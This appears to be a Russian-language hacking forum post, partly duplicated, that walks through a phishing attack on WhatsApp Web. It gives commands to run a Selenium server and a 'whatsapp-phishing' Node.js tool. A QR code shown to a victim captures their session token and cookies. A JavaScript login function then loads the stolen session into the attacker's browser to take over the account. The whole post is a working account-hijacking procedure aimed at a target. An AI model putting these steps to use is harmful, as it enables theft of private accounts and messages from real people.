HHIDE_DUMP
Гость
H
HHIDE_DUMP
Гость
В этой теме пойдет речь о взломе мессенджера WhatsApp.
Для начала, немного истории, не так давно (вроде бы, весной 2016) компания объявила, о том, что вся переписка и личные данные защищены методом «Сквозного шифрования», вот как о нем говорит сама компания:
Сквозное шифрование доступно, в случае если вы и ваши собеседники используете последние версии WhatsApp. Сквозное шифрование гарантирует, что только вы и человек, с которым вы общаетесь, можете прочитать содержимое, и никто кроме Вас. Все сообщения защищены уникальным замком. Только у адресата и у вас есть специальный ключ, который необходим, чтобы разблокировать и прочитать сообщения. Для дополнительной защиты каждое сообщение, которое вы отправляете, имеет уникальный замок и ключ. Все это происходит автоматически: вам не нужно настраивать параметры или создавать специальные секретные чаты, чтобы обеспечить защиту сообщений. Отключить сквозное шифрование невозможно.
Даже администрация мессенджера не в силах расшифровать Ваши данные. Это, безусловно, шикарная новость для пользователей. Но, как известно, безопасность - это иллюзия. Далее будет описан взлом с использованием фишинга.
Начнем.
Во-первых, необходимо скачать Selenium, jar файл отсюда
Selenium Server – это сервер, который позволяет управлять браузером с удалённой машины, по сети. На той машине, где должен работать браузер, устанавливается и запускается сервер. Затем на другой машине запускается программа, которая, используя специальный драйвер RemoteWebDriver, соединяется с сервером и отправляет ему команды. Затем запускает браузер и выполняет в нём эти команды, используя драйвер, соответствующий этому браузеру.
Затем перейдем в папку, куда он был скачан:
Не исключаю, что для корректной работы сервера потребуется geckodriver, его можно взять отсюда:
Теперь необходимо получить утилиту whatsapp-phishing, откроем новое окно терминала и напишем:
Эта команда позволит установить все необходимое, Node.js и Socket.io, которые требуются для запуска веб-сайта и сервера Selenium. Если в процессе вы столкнулись с выводами команды - "Missing", то можно установить все вручную по порядку:
Теперь, перейдя по ссылке в браузере – localhost:8080, видим это:
Выделенный QR необходимо доставить целевому устройству. Затем оно должно просканировать его своим приложением WhatsApp. Когда все сделано, WhatsApp аутентифицирует браузер, который управляется Selenserver и позволит получать token и document.cookie от целевой системы.
Итак, после того, QR был просканирован, можно скопировать token и document.cookie.
Перейдем в терминал, где запущен whatsapp-phishing и скопируем оттуда следующие строки:
Предлагаю запустить новую вкладку браузера в режиме «приват». В ней перейдем на сайт web.whatsapp.com.
Затем, на этой вкладке откроем режим разработчика:
Пишем в строке:
Необходимо очень внимательно это делать, так как синтаксис будет ругаться на скопированные пробелы и т.д.
Затем пишем руками код следующего содержания:
Для начала, немного истории, не так давно (вроде бы, весной 2016) компания объявила, о том, что вся переписка и личные данные защищены методом «Сквозного шифрования», вот как о нем говорит сама компания:
Сквозное шифрование доступно, в случае если вы и ваши собеседники используете последние версии WhatsApp. Сквозное шифрование гарантирует, что только вы и человек, с которым вы общаетесь, можете прочитать содержимое, и никто кроме Вас. Все сообщения защищены уникальным замком. Только у адресата и у вас есть специальный ключ, который необходим, чтобы разблокировать и прочитать сообщения. Для дополнительной защиты каждое сообщение, которое вы отправляете, имеет уникальный замок и ключ. Все это происходит автоматически: вам не нужно настраивать параметры или создавать специальные секретные чаты, чтобы обеспечить защиту сообщений. Отключить сквозное шифрование невозможно.
Даже администрация мессенджера не в силах расшифровать Ваши данные. Это, безусловно, шикарная новость для пользователей. Но, как известно, безопасность - это иллюзия. Далее будет описан взлом с использованием фишинга.
Начнем.
Во-первых, необходимо скачать Selenium, jar файл отсюда
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Selenium Server – это сервер, который позволяет управлять браузером с удалённой машины, по сети. На той машине, где должен работать браузер, устанавливается и запускается сервер. Затем на другой машине запускается программа, которая, используя специальный драйвер RemoteWebDriver, соединяется с сервером и отправляет ему команды. Затем запускает браузер и выполняет в нём эти команды, используя драйвер, соответствующий этому браузеру.
Затем перейдем в папку, куда он был скачан:
> cd Загрузки/
> chmod a+x (позволим файлу исполнение)
> ./selenium-server-standalone-3.0.0-beta4.jar (стартуем сервер)
Не исключаю, что для корректной работы сервера потребуется geckodriver, его можно взять отсюда:
Теперь необходимо получить утилиту whatsapp-phishing, откроем новое окно терминала и напишем:
> git clone
Затем перейдем в папку с whatsapp-phishing:Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
> cd whatsapp-phishing
И внимательно выполняем следующие команды:> npm install
npm(Node.js Package Manager) — менеджер пакетов, входящий в состав Node.js.Эта команда позволит установить все необходимое, Node.js и Socket.io, которые требуются для запуска веб-сайта и сервера Selenium. Если в процессе вы столкнулись с выводами команды - "Missing", то можно установить все вручную по порядку:
> npm install node.js
> npm install socket.io
> npm install wd
После того, как все необходимое было установлено, вводим в терминале следующую команду:> nodejs index.js
В случае если вы все сделали правильно, увидите такой вывод:Теперь, перейдя по ссылке в браузере – localhost:8080, видим это:
Выделенный QR необходимо доставить целевому устройству. Затем оно должно просканировать его своим приложением WhatsApp. Когда все сделано, WhatsApp аутентифицирует браузер, который управляется Selenserver и позволит получать token и document.cookie от целевой системы.
Итак, после того, QR был просканирован, можно скопировать token и document.cookie.
Перейдем в терминал, где запущен whatsapp-phishing и скопируем оттуда следующие строки:
Предлагаю запустить новую вкладку браузера в режиме «приват». В ней перейдем на сайт web.whatsapp.com.
Затем, на этой вкладке откроем режим разработчика:
Пишем в строке:
> var t= (затем копируем сюда код из консоли whatsapp-phishing)
Необходимо очень внимательно это делать, так как синтаксис будет ругаться на скопированные пробелы и т.д.
Затем пишем руками код следующего содержания:
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}
Жмем enter, и последняя команда:> login (t)
Теперь перезагрузим вкладку браузера, результатом будет доступ к аккаунту устройства, которое просканировало наш QR в начале.